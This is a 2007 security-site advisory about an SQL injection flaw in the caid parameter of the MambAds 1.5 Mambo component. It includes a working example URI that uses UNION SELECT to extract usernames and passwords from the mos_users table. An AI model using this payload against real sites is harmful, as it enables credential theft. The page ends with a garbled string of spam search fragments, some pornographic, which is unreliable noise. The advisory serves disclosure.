about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MambAds Mambo Component CAID Parameter SQL Injection Vulnerability


Title MambAds Mambo Component CAID Parameter SQL Injection Vulnerability
Published 2007-09-29-12:00AM
Updated 2007-10-01-06:29PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  sniper456 is credited with the discovery of this vulnerability.
Vulnerable  MambAds MambAds 1.5
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 10:01:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.89.c0m tamilsex.c people Free xxxmo www.&a t368t WWW.TAMIL CMS is Fre Image down WWW.TAMIL y movic bbs.fpoint mambo Remo oprea guest book www.worlds t833t mambo Remo bbs.fpoint www.nmgxin freesex.co bbs.fpoint www.sex. 2.6.17.6. xxxsexpoto wow roster wow roster deshibaba. news for c Pinkword.c news for c Vidio sex kaht2.zip hhht.1414. Vulner abi apache 2.0 ThumbNails chodachudi apache 2.0 news for c t225t bbs.fpoint search/exp o my goody t979t 200 /compo www.anisex Agnes ngen clit girl sexanmal